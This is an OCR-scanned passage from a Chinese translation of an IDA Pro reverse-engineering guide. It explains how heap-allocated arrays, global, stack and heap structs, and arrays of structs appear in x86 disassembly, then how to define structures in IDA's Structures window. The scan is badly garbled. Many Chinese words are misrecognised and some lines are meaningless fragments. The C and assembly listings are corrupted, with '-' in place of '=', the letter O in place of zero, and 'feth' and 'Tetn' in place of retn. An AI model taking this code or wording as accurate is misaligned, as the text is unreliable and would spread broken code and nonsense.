3. 堆 分 配 的 数组 

堆 分 配 的 数组 是 使 用 一 个 动态 内 存 分 配 函 数 ( 如 C 中 的 malloc 或 C++ 中 的 new) 分 配 的 。 
从 编译 硕 的 角度 讲 , 处 理 堆 分 配 的 数组 的 主要 区 别 在 于 , 它 必 须根 据 内 存 分 配 消 数 返 回 的 地 址 值 ， 
生成 对 数组 的 所 有 引用。 为 方便 比较 ,我们 以 下 面 这 个 水 数 为 例 ， 它 在 程序 堆 中 分 配 了 一 个 小 型 
数组 : 





















































int main() { 
int *heap array - (int*)malloc(3 * sizeof(int)); 
int idx = 2; 


heap array[O] = 10; 
heap array[1] = 20; 
heap array[2] = 30; 
heap array[idx] - 40; 


—— 


通过 人 研究 下 面 的 反 汇编 代码 清单 ， 我 们 发 现 它 与 前 面 两 个 代码 段 的 一 些 相 似 之 处 和 不 同 之 处 : 
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.text:00401000 main proc near 
. text : 00401000 


.text:00401000 heap array - dword ptr -8 
.text:00401000 idx - dword ptr -4 

. text : 00401000 

. text : 00401000 push ebp 

. text :00401001 mov ebp, esp 

. text : 00401003 sub esp, 8 

. text :00401006 push oCh ; size t 
. text : 00401008 call  malloc 

. text :0040100D add esp, 4 

. text :00401010 mov [ebp+heap array], eax 
.text :00401013 mov [ebpridx], 2 

. text :0040101A mov eax, [ebp«heap array] 
. text :0040101D Omov dword ptr [eax], 10 

. text : 00401023 mov ecx, [ebp+heap array | 
.text:00401026 @mov dword ptr [ecx«4], 20 
. text :0040102D mov edx, [ebp+heap array] 
. text :00401030 mov dword ptr [edx«8], 30 
. text: 00401037 mov eax, [ebp+idx] 

. text :0040103A mov ecx, [ebp+heap_array] 
. text :0040103D Omov dword ptr [ecx+eax*4], 40 
. text : 00401044 xor eax, eax 

. text :00401046 mov esp, ebp 

. text :00401048 pop ebp 

. text : 00401049 retn 

.text:00401049 main endp 


数组 的 起 始 地 址 (由 EAX 寄存 器 中 的 malloc 返回 ) 存储 在 局 部 变量 heap array 中 。 这 个 例 
子 与 前 面 两 个 例子 不 同 ， 每 一 次 访问 数组 时 ， 首 先 必 须 谈 取 heap array 的 内 容 ， 以 获得 数组 的 
基 址 ， 然 后 再 在 它 上 面 加 上 一 个 偏 移 值 ， 计 算出 数组 中 对 应 元 系 的 地 址 。 引 用 heap_array[0]、 
heap_array[1] 和 heap arrayL2]75 EI fe 523912 0. Af 8-5, WO, OMOLE. 5l 
heap_array[idx]@ 处 的 操作 与 前 面 的 例子 最 为 相似 , 它 在 数组 中 的 偏 移 量 通过 将 数组 索引 与 数组 
元 素 大 小 相 乘 计算 得 出 。 

堆 分 配 的 数组 有 一 个 非常 有 用 的 特点 。 如 果 能 够 确定 数组 的 总 大 小 和 每 个 元 素 的 大 小 , 我 们 
可 以 轻松 计算 出 该 数组 所 包含 的 元 素 的 数量 。 对 堆 分 配 的 数组 而 言 , 传递 给 内 存 分 配 消 数 的 参数 
( 0x0C 在 @ 处 传递 给 了 malloc) 即 表示 分 配给 数组 的 字 节 总 数 ， 用 这 个 数 除 以 元 素 大 小 ( 本 例 为 
4 字 节 ， 如 O@、@ 和 @ 处 的 偏 移 量 所 示 )， 即 可 得 到 数组 中 元 素 的 个 数 。 前 面 的 例子 分 配 了 一 个 包 
含 3 个 元 系 的 数组 。 

关于 数组 的 使 用 ,我 们 能 够 得 出 的 唯一 确定 的 结论 是 : 只 有 当 变 量 被 用 作 数 组 的 索引 时 ,我 
们 才 最 容易 确定 数组 的 存在 。 要 访问 数组 中 的 元 素 ， 首 先 需要 用 索引 乘 以 数组 元 素 的 大 小 ， 计 算 
出 相应 元 素 的 偏 移 量 , 然后 将 得 到 的 偏 移 量 与 数组 的 基 址 相 加 ,得 到 数组 元 素 的 访问 地 址 。 遗 憾 
的 是 , 如 我 们 在 下 一 节 所 述 , 在 使 用 常量 索引 值 访问 数组 元 素 时 , 它们 很 少 能 够 证 明 数 组 的 存在 ， 
并 且 看 起 来 与 用 于 访问 结构 体 成 员 的 代码 非常 类 似 。 
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8.1.2 ”结构 体 成 员 访 问 


C 结构 体 ， 这 里 通称 为 结构 体 ， 是 异类 数据 集合 ， 可 将 数据 类 型 各 不 相同 的 项 组 合 到 一 个 复 
合 数据 类 型 中 。 结 构 体 的 一 个 显著 特点 在 于 ,结构 体 中 的 数据 字段 是 通过 名 称 访问 ， 而 不 是 像 数 
组 那样 通过 索引 访问 。 不 好 的 是 ,字段 名 称 被 编 痒 可 转换 成 了 数 子 仿 移 量 。 结果， 在 反 沪 编 代 码 
清单 中 ,访问 结构 体 字 段 的 方式 看 起 来 与 使 用 常量 索引 访问 数组 元 系 的 方式 极其 相似 。 

如 果 编 译 带 过 到 一 个 结构 体 定义 , 它 会 计算 出 结构 体 中 字段 所 耗 用 字 节 的 累计 值 ， 以 确定 结 
构 体 中 每 个 字段 的 偶 移 量 。 下 面 的 结构 体 定义 将 用 在 随后 的 例子 中 : 


struct ch8 struct { //Size Minimum offset Default offset 























int field1; // 4 0 0 
short field2; // 2 4 4 
char field3; // 1 6 6 
int field4; // 4 7 8 
double fields; // 8 11 16 
F //Minimum total size: 19 Default size: 24 





分 配 结构 体 所 需 的 最 小 空间 ， 由 分 配 结构 体 中 的 字段 所 需 的 空间 总 和 决定 。 但 是 , 你 绝 不 能 
因此 认为 编译 器 会 利用 所 需 的 最 小 空间 来 分 配 结构 体 。 默认 情况 下 , 编译 各 会 设法 将 结构 体 字段 
与 内 存 地 址 对 齐 ， 以 最 有 效 地 谈 取 和 写 人 这 些 字 段 。 例 如 ，4 字 节 的 整数 字段 将 与 能 够 被 4 整除 
EXT, mM 8 字 市 的 双 字 则 与 能 够 被 8 整除 的 偏 移 量 对 齐 。 根 据 结构 体 的 构成 ,满足 对 齐 
要 求 可 能 需要 插入 填补 字 方 , 使 结构 体 的 实际 大 小 大 于 字段 大 小 的 总 和 。 前面 例 子 中 结构 体 的 默 
认 偏 移 量 和 最 终 的 结构 体 大 小 位 于 Default offset 一 列 中 。 

通过 使 用 编译 天 选项 来 要 求 特 定 的 成 员 对 齐 ， 可 将 结构 体 压 缩 到 最 小 空间 。Microsoft 
Visual C/C++ 和 GNU gcc/g++ 都 将 pack 杂 注 ( pragma ) 视 为 控制 结构 体 字 段 对 齐 的 一 种 方法 。 
同时 , GNU 编译 融 还 使 用 packed 属性 来 控制 结构 体 对 齐 (在 每 个 结构 体 的 基础 上 )。 要 求 结构 
体 字 段 进行 1 字 节 对 齐 ， 编 译 需 会 将 结构 体 压 缩 到 最 小 空间 。 就 我 们 例子 中 的 结构 体 而 言 ， 这 
样 做 将 得 到 Minimum offset 一 列 中 的 偏 移 量 和 结构 体 大 小 。 值 得 注意 的 是 ， 如 果 以 这 种 方式 对 
齐 数据 ， 一 些 CPU 的 性 能 更 加 优良 ; 但 是 ， 如 果 有 些 边界 上 的 数据 并 未 对 齐 ，CPU 可 能 会 产 
EFH o 

了 解 这 些 事 实 后 , 我 们 就 可 以 着 手 分 析 编 译 代码 是 如 何 处 理 结构 体 的 。 为 了 进行 比较 , 要 注 
意 ， 和 数组 一 样 , 结构 体 成 员 的 访问 是 通过 将 结构 体 的 基 址 加 上 将 要 访问 的 成 员 的 偏 移 量 来 实现 
DI. 然而, 虽然 数组 元 系 的 偏 移 量 可 在 运行 时 由 提供 的 索引 值 计 算出 来 C 因为 每 个 数组 元 系 的 大 
小 相同 )， 但 结构 体 成 员 的 偏 移 量 必须 预先 计算 出 来 ， 作 为 固定 偏 移 量 出 现在 编译 代码 中 ， 因 而 
看 起 来 与 使 用 常量 索引 的 数组 引用 几乎 完全 相同 。 

1. 全 局 分 配 的 结构 体 

和 全 局 分 配 的 数组 一 样 ， 编 译 需 在 编译 时 可 获知 全 局 分 配 的 结构 体 的 地 址 。 这 使 得 编译 需 能 
人 够 在 编译 时 计算 出 结构 体 中 每 个 成 员 的 地 址 ， 而 不 必 在 运行 时 进行 任何 计算 。 以 下 面 这 个 访问 全 
局 分 配 的 结构 体 的 程序 为 例 : 
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struct ch8 struct global struct; 


int main() { 
global struct.fieldi - 10; 
global struct.field2 - 20; 
global struct.field3 - 30; 
global struct.field4 = 40; 
global struct.field5 - 50.0; 


j 


如 果 使 用 默认 的 结构 体 对 齐 选项 编译 这 个 程序 ， 在 反 汇编 时 ， 我 们 可 能 会 得 到 下 面 的 代码 
清单 : 


.text:00401000 main proc near 

. text : 00401000 push ebp 

. text :00401001 mov ebp, esp 

. text :00401003 mov dword 40EA60, 10 
. text :0040100D mov word 40EA64, 20 
. text :00401016 mov byte 40EA66, 30 
. text :0040101D mov dword 40EA68, 40 
. text : 00401027 fld ds:dbl 40B128 

. text :0040102D fstp dbl 40EA70 

. text : 00401033 xor eax, eax 

. text :00401035 pop ebp 

. text: 00401036 retn 

.text:00401036 main endp 








可 以 看 到 , 在 这 个 反 汇 编 代 码 清单 中 , 访问 结构 体 成 员 不 需要 任何 算术 计算 ， 如 果 没 有 源 代 
码 ,你 根本 无 法 断定 这 个 程序 使 用 了 结构 体 。 因 为 编译 带 在 编译 时 已 经 计算 出 所 有 的 仿 移 量 ,， 这 
个 程序 似乎 引用 的 是 5 个 全 局 变量 ,而 不 是 一 个 结构 体 中 的 5 个 字段 。 你 应 该 能 够 注意 到 ， 这 种 
情况 与 前 面 例子 中 使 用 第 量 索 引 值 的 全 局 分 配 的 数组 非 第 类 似 。 

2. 栈 分 配 的 结构 体 

和 栈 分 配 的 数组 一 样 (参见 8.1.1 市 的 第 2 小 市 ), 仅仅 根据 栈 布局 ,同样 很 难 识别 出 栈 分 配 
的 结构 体 。 对 前 面 的 程序 进行 修改 ,使 其 使 用 一 个 栈 分 配 的 结构 体 ， 并 在 main 中 进行 声明 ， 可 
得 到 下 面 的 反 汇 编 代码 清单 : 

















.text:00401000 main proc near 
.text:00401000 
.text:00401000 var 18 


dword ptr -18h 


.text:00401000 var 14 = word ptr -14h 

.text:00401000 var 12 - byte ptr -12h 

.text:00401000 var 10 = dword ptr -10h 
.text:00401000 var 8 - qword ptr -8 

. text : 00401000 

. text : 00401000 push ebp 

. text :00401001 mov ebp, esp 


. text : 00401003 sub esp, 18h 
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.text:00401006 mov [ebp+var 18], 10 
. text : 0040100D mov [ebp+var 14], 20 
. text : 00401013 mov [ebp+var 12], 30 
. text : 00401017 mov [ebp+var 10], 40 
. text :0040101E fld ds:dbl 40B128 

. text:00401024 fstp [ebp+var 8] 

. text :00401027 xor eax, eax 

. text :00401029 mov esp, ebp 

. text :0040102B pop ebp 

. text :0040102C feth 

.text:0040102C main endp 





同样 ， 访问 结 构 体 中 的 字段 不 需要 进行 任何 算术 计算 ， 因 为 在 编 详 时 ， 编 详 天 能够 确定 栈 帧 
内 每 个 字段 的 相对 俩 移 量 。 在 这 种 情况 下 ,我们 同样 会 被 误导 ， 认 为 程序 使 用 的 是 5 个 变量 ， 而 
不 是 一 个 碰巧 包含 5 个 字段 的 变量 。 实 际 上 ，var_18 应 该 是 一 个 大 小 为 24 字 节 的 结构 体 的 第 一 
个 变量 ， 其 他 变量 应 进行 某 种 格式 化 ， 以 反映 它们 是 结构 体 中 的 字段 这 一 事实 。 

3. 堆 分 配 的 结构 体 

事实 上 , 关于 结构 体 的 大 小 及 其 字段 的 布局 , 堆 分 配 的 结构 体 体 现 了 更 多 信息 。 如 果 一 个 结 
构 体 在 程序 堆 中 分 配 ， 那么 , 在 访问 其 中 的 字段 时 ， 编 译 需 别 无 选择 ， 只 有 生成 代码 来 计算 每 个 
字段 在 结构 体 中 的 正确 偏 移 量 。 这 是 结构 体 的 地 址 在 编译 时 未 知 所 导致 的 后 果 。 对 于 全 局 分 配 的 
结构 体 ， 编 译 融 能够 计算 出 一 个 固定 的 起 始 地 址 。 对 于 栈 分 配 的 结构 体 ， 编 译 融 能 够 计算 出 结构 
体 起 始 位 置 与 相关 栈 帧 的 帧 指针 之 间 的 固定 关系 。 如 果 一 个 结构 体 在 堆 中 分 配 , 那么 对 编译 融 来 
说 ,引用 该 结构 体 的 唯一 线索 就 是 指 癌 该 结构 体 起 始 地 址 的 指针 。 

再 次 修改 上 面 的 例子 , 使 其 使 用 堆 分 配 的 结构 体 , 从 而 得 到 下 面 的 反 汇 编 代 人 码 清单 。 与 8.1.1 
市 的 第 3 小 节 的 推 分 配 的 数组 示例 一 样 ， 我 们 在 main 中 声明 一 个 指针 ， 并 给 它 分 配 足够 的 内 存 
块 ， 以 保存 我 们 的 结构 体 : 
































.text:00401000 main proc near 

.text:00401000 

.text:00401000 heap struct = dword ptr -4 

.text:00401000 

.text:00401000 push ebp 

.text:00401001 mov ebp，esp 

. text : 00401003 push ecx 

. text :00401004 @push 24 ; size t 
. text : 00401006 call _malloc 

. text :0040100B add esp, 4 

. text :0040100E mov [ebp+heap_struct], eax 
. text :00401011 mov eax, [ebp+heap struct] 
. text :00401014 € mov dword ptr [eax], 10 

. text :0040101A mov ecx, [ebp+heap struct] 
. text :0040101D mov word ptr [ecx«4], 20 

. text : 00401023 mov edx, [ebp+heap struct] 
. text :00401026 emov byte ptr [edx«6], 30 


. text :0040102A mov eax, [ebp«heap struct] 
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.text:0040102D Omov dword ptr [eax«8], 40 
. text :00401034 mov ecx, [ebp+heap struct] 
. text : 00401037 fld ds:dbl 40B128 

. text : 0040103D efstp qword ptr [ecx+10h 

. text: 00401040 xor eax, eax 

. text : 00401042 mov esp, ebp 

. text : 00401044 pop ebp 

. text : 00401045 retn 

.text:00401045 main endp 





在 这 个 例子 中 ,与 全 局 和 栈 分 配 的 结构 体 示 例 不 同 ,我 们 能 够 辨别 出 结构 体 的 实际 大 小 和 布局 。 
根据 @ 处 malloc 所 需 的 内 存 数 量 , 我 们 推断 出 : 结构 体 的 大 小 为 24 字 节 。 该 结构 体 包 含 以 下 字段 : 

口 一 个 4 字 节 字段 (dword )， 偏 移 量 为 0 (@ ); 

口 一 个 2 字 节 字段 (word )， 偏 移 量 为 4 (0); 

口 一 个 1 F FR, MEEN 6 ( @ ); 

口 一 个 4 字 节 字段 (dword )， 偏 移 量 为 8 (9); 

口 一 个 8 学 市 字段 ( qword )， 偏 移 量 为 16 (10h)(@)。 

根据 浮 点 指令 的 用 法 ， 我 们 可 以 进一步 推 其 出 qword 字段 实际 上 是 double 类 型 的 。 如 果 要 
求 结 构 体 进行 1 字 节 对 齐 ， 对 其 进行 压缩 ， 则 该 程序 的 反 汇 编 代 码 清单 为 : 











.text:00401000 main proc near 

. text : 00401000 

.text:00401000 heap struct - dword ptr -4 

. text : 00401000 

. text : 00401000 push ebp 

. text :00401001 mov ebp, esp 

. text : 00401003 push ecx 

. text :00401004 push 19 ; size t 
. text :00401006 call  malloc 

. text :0040100B add esp, 4 

. text: 0040100E mov [ebp+heap struct], eax 
.text:00401011 mov eax, [ebp+heap struct] 
. text :00401014 mov dword ptr [eax], 10 

. text :0040101A mov ecx, [ebp+heap struct] 
. text :0040101D mov word ptr [ecx«4], 20 

. text : 00401023 mov edx, [ebp+heap struct] 
. text :00401026 mov byte ptr [edx«6], 30 

. text: 0040102A mov eax, [ebp+heap struct] 
. text :0040102D mov dword ptr [eax«7], 40 
. text : 00401034 mov ecx, [ebp+heap struct] 
;E6xt: 00401037 fld ds:dbl 40B128 

. text :0040103D fstp qword ptr [ecx«oBh] 

. text : 00401040 xor eax, eax 

. text :00401042 mov esp, ebp 

. text :00401044 pop ebp 

. text :00401045 Tetn 


.text:00401045 main endp 
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这 时 , 这 个 程序 的 唯一 不 同 在 于 , 结构 体 变 得 更 小 (现在 只 有 19 个 字 节 ), RER br, 
因为 每 个 结构 体 字段 进行 了 重新 对 齐 。 

不 管 在 编译 程序 时 是 否 进行 了 对 齐 操作 , 找到 在 程序 堆 中 分 配 和 操纵 的 结构 体 , 是 确定 给 定 
数据 结构 的 大 小 和 布局 的 最 简单 方法 。 但是, 需要 记 住 的 是 , 在 许多 函数 中 ， 你 不 能 立即 访问 结 
构 体 的 每 个 成 员 ， 以 理解 该 结构 体 的 布局 。 你 可 能 需要 观察 结构 体 中 指针 的 用 法 , 并 记 下 每 次 指 
针 取 消 引 用 时 使 用 的 偏 移 量 。 这 样 ， 你 最 终 将 能 够 了 解 结构 体 的 完整 布局 。 

4. 结构 体 数组 

一 些 程 序 员 认 为 , 复合 数据 结构 极 具 美 感 ， 因 为 你 可 在 大 型 结构 体 中 般 入 小 型 结构 体 , 创建 
复杂 程度 各 不 相同 的 结构 体 。 除 其 他 可 能 性 外 , 这 种 能 力 还 允许 你 创建 结构 体 数 组 ,结构 体 中 的 
结构 体 ， 以 及 以 数组 为 成 员 的 结构 体 。 在 处 理 这 些 般 套 结构 时 ,前 面 有 关 数 组 和 结构 体 的 讨论 同 
样 适用 。 以 下 面 的 这 个 程序 为 例 ， 它 是 一 个 结构 体 数 组 ， 其 中 的 heap struct 指 癌 一 个 包含 5 个 
ch8 struct 元 素 的 数组 : 



































int main() { 
int idx -= 1; 
struct ch8 struct *heap struct; 
heap struct = (struct ch8 struct*)malloc(sizeof(struct ch8 struct) * 5); 
o heap struct[idx].fieldi = 10; 


j 


访问 @ 处 的 fieldl 所 需 的 操作 包括 : 用 索引 值 乘 以 数组 元 素 的 大 小 (这 里 为 结构 体 的 大 小 小 
然后 加 上 field 这 个 字段 的 俩 移 量 。 下 面 是 对 应 的 反 汇 编 代 码 清单 : 








.text:00401000 main proc near 

. text : 00401000 

.text:00401000 idx - dword ptr -8 

.text:00401000 heap struct - dword ptr -4 

. text : 00401000 

. text : 00401000 push ebp 

. text :00401001 mov ebp, esp 

. text : 00401003 sub esp, 8 

. text : 00401006 mov [ebpridx], 1 

. text :0040100D O push 120 ; sizet 
. text :0040100F call  malloc 

. text :00401014 add esp, 4 

. text : 00401017 mov [ebprheap struct], eax 
. text :0040101A mov eax, [ebp+idx | 
.text:0040101D ©@imul eax, 24 

. text : 00401020 mov ecx, [ebp+heap struct ] 
. text : 00401023 Omov dword ptr [ecx+eax], 10 
. text :0040102A xor eax, eax 

. text:0040102C mov esp, ebp 

. text :0040102E pop ebp 

. text :0040102F retn 


.text:0040102F main endp 
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从 代码 清单 中 可 以 看 出 : 堆 请 求 了 120 个 字 节 (四 )， 数 组 索引 乘 以 24 (9 )， 然 后 加 上 数组 
的 起 始 地 址 (4@ )。 为 了 生成 @ 处 对 绪 束 地 址 的 引用 ， 没 有 加 上 其 他 的 偶 移 量 。 从 这 些 事实 ， 我 
们 可 以 推断 出 数组 的 大 小 《24 )， 数 组 中 元 系 的 个 数 ( 120/24=5 ); 同时 ， 在 每 个 数组 元 系 中 俩 移 
EN 0 的 位 置 ， 有 一 个 4 字 市 的 字段 。 至 于 每 个 结构 体 中 剩余 的 20 个 字 市 是 如 何 分 配给 其 他 字 
段 的 ， 这 个 简短 的 列表 并 没有 提供 足够 的 信息 。 


8.2 创建 1DA 结构 体 


在 上 一 章 中 ， 我 们 见识 了 IDA 的 数组 聚合 能 力 ， 它 通过 将 一 长 串 的 数据 声明 变 成 一 个 反 汇 
编 行 ， 价 化 了 反 汇 编 代码 清单 。 在 下 面 几 市 中 ， 我 们 将 讨论 IDA 如 何 使 用 各 种 工具 来 改善 操纵 
结构 体 的 代码 的 可 读 性 。 我 们 的 目标 是 用 更 具 可 读 性 的 [edx+ch8_struct.field5] 替 换 [edx+10h] 
之 类 的 结构 体 引 用 。 

只 要 发 现 一 个 程序 正 操纵 某 种 数据 结构 ,你 就 需要 确定 : 你 是 否 希 望 将 结构 体 的 字段 名 称 合 
并 到 反 汇 编 代码 清单 中 , 或 者 你 是 否 理 解 分 散在 代码 清单 中 的 所 有 数字 偏 移 量 。 有 了 时候 , IDA 能 
人 够 确定 程序 在 调用 C 标准 库 或 Windows API 的 过 程 中 定义 了 一 个 结构 体 。 这 时 , IDA. 了 人 解 该 结构 
体 的 具体 布局 ， 并 旦 能 够 将 数字 偏 移 量 转换 成 更 加 符号 化 的 字段 名 称 。 这 是 一 种 理想 化 的 情形 ， 
因为 你 并 没有 多 少 工 作 要 做 。 在 我 们 初步 了 解 IDA 如 何 处 理 通常 的 结构 体 定义 后 ， 我 们 将 继续 


讨论 这 种 情形 。 
8.2.1 创建 一 个 新 的 结构 体 (或 联合 ) 


如 果 程 序 正 使 用 某 个 结构 体 ， 而 IDA 并 不 了 解 其 布局 ， 这 时 ，IDA 会 提供 实用 工具 以 设置 
该 结构 体 的 布局 ， 并 将 新 定义 的 结构 体 包 含 到 反 汇 编 代 码 清单 中 。IDA 使 用 Structures 窗口 (如 
图 8-2 所 示 ) 来 创建 新 的 结构 体 。 除 非 结构 体 已 经 在 Structures 窗口 中 列 出 ， 和 否则 就 无 法 将 结构 
体 包含 到 反 汇 编 代码 清单 中 。IDA 将 自动 在 Structures 窗口 中 列 出 任何 它 能 够 识别 、 并 确定 已 被 
一 个 程序 使 用 的 结构 体 。 









































E 


; Ins/Del : create/delete structure 


; D/A/* : create structure member (data/ascii/array) 
PN : rename structure or structure member 
; U : delete structure member 





K] 8-2 Structures 窗口 


IDA 之 所 以 在 分 析 阶 段 无 法 识别 结构 体 ， 可 能 源 于 两 个 原因 。 首 先 ， 虽 然 DA 了解 某 个 结 
构 体 的 布局 , 但 它 并 没有 足够 的 信息 ,能够 判断 程序 确实 使 用 了 结构 体 。 其 次 ,程序 中 的 结构 体 
可 能 是 一 种 IDA 对 其 一 无 所 知 的 非 标 准 结构 体 。 在 这 两 种 情况 下 ， 问 题 都 可 以 得 到 解决 ， 且 首 
FM Structures A O FF- 
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Structures 窗口 的 前 4 行文 本 用 于 提醒 用 户 该 窗口 中 可 能 进行 的 操作 。 我 们 使 用 的 主要 操作 
包括 添加 、 删除 和 编辑 结构 体 , 添加 结构 体 使 用 热 键 INSERT 启动 , 它 打开 如 图 8-3 所 示 的 Create 
structure/union ( 创建 结构 体 / 联 合 ) 对 话 框 。 











EI Create structure/union 全 | xl 
Structure name | ch8 struct S 





Add standard structure | 





图 8-3 Create structure/union 对 话 框 


为 了 创建 一 个 新 的 结构 体 ， 你 必须 首先 在 Structure name ( 结构 体 名 称 ) 字段 中 指定 结构 体 











的 和 名称。 前 两 个 复 选 框 用 于 决定 新 结构 体 在 Structures 窗口 中 的 显示 位 置 ， 或 者 是 否 在 窗口 中 显 
示 新 结构 体 。 第 三 个 复 选 框 Creat union ( 创建 联合 )， 指 定 你 定义 的 是 否 为 C 风格 联合 "结构 体 。 
结构 体 的 大 小 是 它 所 包含 的 字段 大 小 的 总 和 ， 而 联合 的 大 小 则 等 于 其 中 最 大 字段 的 大 小 。Add 
standard structure ( 添加 标准 结构 体 ) 按钮 用 于 访问 IDA 当前 能 够 识别 的 全 部 结构 体 数据 类 型 。 
这 个 按钮 的 作用 将 在 8.5 市 讨论 。 指定 结构 体 的 名 称 并 单 击 OK 按钮 后 , IDA 将 在 Structures 窗口 
中 创建 一 个 空 结构 体 定义 ， 如 图 8-4 rn. 

[Structures NNN x 


00000000 ; Ins/Del : create/delete structure 

00000000 ; D/A/* : create structure member (data/ascii/array) 
00000000 ; : rename structure or structure member 
00000000 ; : delete structure member 

00000000 ; 

00000000 








00000000 ch8 struct 
00000000 ch8 struct 
00000000 


| 1. ch8 struct:0000 


4 








图 8-4” 空 结构 体 定义 
你 必须 对 这 个 结构 体 定义 进行 编辑 ， 以 完成 对 结构 体 布局 的 定义 。 
8.2.2 ”编辑 结构 体 成 员 
为 了 给 新 结构 体 添加 字段 ， 你 必须 利用 字段 创建 命令 D、A 和 数字 键盘 上 的 星 号 键 (* )。 最 














(D 联合 类 似 于 结构 体 ， 其 中 可 能 包含 许多 类 型 各 不 相同 的 具名 字段 。 二 者 的 区 别 在 于 ,联合 中 的 字段 相互 重 全 ， 
此 ， 联 合 的 大 小 等 于 其 中 最 大 字段 的 大 小 。 
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初 ， 你 只 需要 使 用 D 命令 。 不 过 ， 它 的 行为 非常 依赖 于 光标 的 位 置 。 为 此 ， 我 们 建议 采用 下 面 
的 步 又 给 结构 体 添加 字段 。 
(1) 要 给 结构 体 添 加 新 字段 ， 将 光标 放 在 结构 体 定 义 的 最 后 一 行 (包含 ends 的 那 一 行 ) 并 按 
下 D 键 .这 时 ,IDA 就 会 在 结构 体 的 末尾 添 加 一 个 新 字段 。 新 字段 的 大 小 取决 于 你 在 数据 转盘 ( 参 
见 第 7 章 ) 上 选择 的 第 一 个 大 小 。 最 初 ， 字 段 的 名 称 为 field W， 这 里 的 W 为 结构 体 开头 到 新 字 
段 ( 如 field 0) 开头 的 数字 偶 移 量 。 
(2) 如 采 需 要 修改 字段 的 大 小 ， 首 和 爷 将 光标 放 在 新 字段 的 名 称 上 ， 然 后 重复 按 下 D 键 ， 使 数 
据 转盘 上 的 数据 类 型 开始 循环 ， 从 而 为 新 字段 选择 正确 的 数据 大 小 。 另 外 ， 你 还 可 以 使 用 
Options » Setup Data Types 来 指定 一 个 在 数据 转盘 上 不 存在 的 大 小 。 如 末 新 字段 是 一 个 数组 ， 石 
击 其 名 称 并 在 上 下 文 沫 单 中 选择 Array， 将 打开 “数组 规范 ”对 话 框 〈《 人 参见 第 7 章 )。 
(3) 要 更 改 一 个 结构 体 字段 的 名 称 ， 单 击 字 段 名 称 并 按 下 N iE, 或 者 右 击 该 名 称 并 在 上 下 文 
来 单 中 选择 ReName， 然 后 在 输入 框 中 输入 一 个 名 称 即 可 。 
在 你 定义 自己 的 结构 体 时 ， 下面 的 提示 可 能 会 有 所 帮助 。 
口 一 个 字段 的 字 市 偏 移 量 以 一 个 8 位 十 六 进 制 值 在 Structures 窗口 的 左 侧 显示 。 
O 每 次 你 添加 或 删除 一 个 结构 体 字 段 ， 或 更 改 一 个 现 有 字段 的 大 小 时 ， 绪 构 体 的 新 大 小 都 
会 在 结构 体 定义 的 第 一 行 反映 出 来 。 

a 你 可 以 给 一 个 结构 体 字 段 添 加 注释 ， 就 像 给 任何 反 汇 编 行 添加 注释 一 样 。 右 击 〈 或 使 用 
TAE) 你 硕 望 为 其 添加 注释 的 字段 ， 在 上 下 文 染 单 中 选择 一 个 注释 选项 即 可 。 

O 与 Structures 窗口 顶部 的 说 明 不 同 的 是 ， 只 有 当 一 个 字段 是 结构 体 中 的 最 后 一 个 字段 时 ， 
使 用 U 键 才 能 删除 该 字段 。 对 于 所 有 其 他 字段 ， 按 下 U 键 将 取消 该 字段 的 定义 ， 这 样 做 
仅仅 删除 了 该 字段 的 名 称 ， 并 没有 删除 分 配给 该 字段 的 字 节 。 

Q 你 必须 对 一 个 结构 体 定 义 中 的 所 有 字段 进行 适当 的 对 齐 。IDA 并 不 区 分 已 压缩 和 未 压缩 

的 结构 体 。 为 将 字段 适当 对 齐 ， 如 有 果 你 需要 填补 字 节 ， 那 么 你 必须 负责 添加 这 些 字 万 。 
填补 字 节 最 好 作为 适当 大 小 的 哑 字 段 深 加 。 在 添加 祯 外 的 字段 后 ， 你 可 以 选择 取消 或 保 
留 这 些 字 段 的 定义 。 

a 分 配 到 结构 体 中 间 的 字 节 只 有 在 取消 关联 字段 的 定义 后 才能 删除 ， 使 用 Edit» Shrink 
Struct Type ( 缩小 结构 体 类 型 ) 即 可 删除 被 取消 定义 的 字 市 。 

O 你 也 可 以 在 结构 体 的 中 间 添 加 新 的 字 节 : 选择 新 字 节 后 面 的 一 个 字段 ， 然 后 使 用 
Edit ^ Expand Struct Type ( 扩大 结构 体 类 型 ) 在 选中 的 字段 前 插入 一 定数 量 的 字 市 。 

口 如 条 知 着 结构 体 的 大 小 ， 而 不 了 解 它 的 布局 ， 你 需要 创建 两 个 字段 。 第 一 个 字段 为 一 个 
数组 ， 它 的 大 小 为 结构 体 的 大 小 减 去 14095678 Csize-105; 第 二 个 字段 应 为 1 个 字 市 。 创 
建 第 二 个 字段 后 ， 取 消 第 一 个 (数组 ) 字段 的 定义 。 这 样 ， 结 构 体 的 大 小 被 保留 下 来 ， 
随后 ， 当 你 进一步 了 解 该 结构 体 的 布局 后 ， 你 可 以 回 过 头 来 定义 它 的 字段 及 其 大 小 。 

通过 重复 应 用 这 些 步 又 〈 添加 字段 ， 设 置 字段 大 小 ， 诡 加 填补 字 布 等 )， 你 就 可 以 在 IDA 中 
创建 ch8 struct 结构 体 〈 未 压缩 版 本 )， 如 图 8-5 Brzn 

在 这 个 例子 中 , IDA 使 用 了 填补 学 市 对 字段 进行 适当 对 齐 , 并 根据 前 面 例子 中 的 名 称 重 命名 字 
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段 。 值 得 注意 的 是 ， 每 个 字段 的 偏 移 量 和 结构 体 的 总 大 小 (24 字 市 ) 仍 与 前 面 的 例子 中 的 值 相同 。 


e : create/delete structure 


: create structure member (data/ascii/array) 


rename structure or structure member 
: delete structure member 


00000018 ch8 struct 


| 1. ch8 struct-000D 





图 8-5” 手动 生成 的 ch8 struct 结构 体 定 义 
如 果 你 觉得 结构 体 定义 在 Structures 窗口 中 占用 了 太 多 空间 ， 你 可 以 选择 结构 体 中 的 任何 字 
段 并 按 下 数字 键盘 中 的 减 号 键 ， 将 结构 体 的 定义 折 和 三 成 一 行 摘要 。 一 旦 结构 体 获 得 完整 的 定义 ， 
并 且 不 需要 进一步 编辑 ， 你 就 可 以 将 它 折 羞 起 来 。ch8_struct BOTAS UIS n 8-6 所 示 。 








00000000 ; Ins/Del : create/delete structure 
00000000 ; D/A/* : create structure member (data/ascii/array) 


00000000 U t t Der 
00000000 [00000018 BYTES. COLLAPSED STRUCT ch8 struct. PRESS KEYPAD "+" TO EXPAND] 

| 1. ch8 struct-0000 v 
BE B 





图 8-6 HÆRE E X. 


绝 大 多 数 IDA 能 够 识别 的 结构 体 都 以 这 种 单行 方式 显示 ， 因 为 你 不 需要 编辑 它们 。 折 合式 
显示 提供 一 个 提示 ， 即 你 可 以 使 用 数字 键盘 上 的 加 号 键 打开 结构 体 定义 。 男 外 ,双击 结 构 体 名 称 
